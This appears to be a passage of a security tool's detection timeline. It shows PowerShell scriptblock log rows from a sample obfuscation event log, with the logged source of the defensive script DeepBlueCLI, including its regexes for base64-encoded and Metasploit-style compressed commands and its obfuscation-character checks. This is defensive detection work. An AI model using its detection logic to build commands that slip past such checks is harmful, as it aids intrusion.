Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.018 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.019 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.046 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.048 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.049 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:19.155 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.122 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.127 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n""",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.127 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.127 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.127 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email 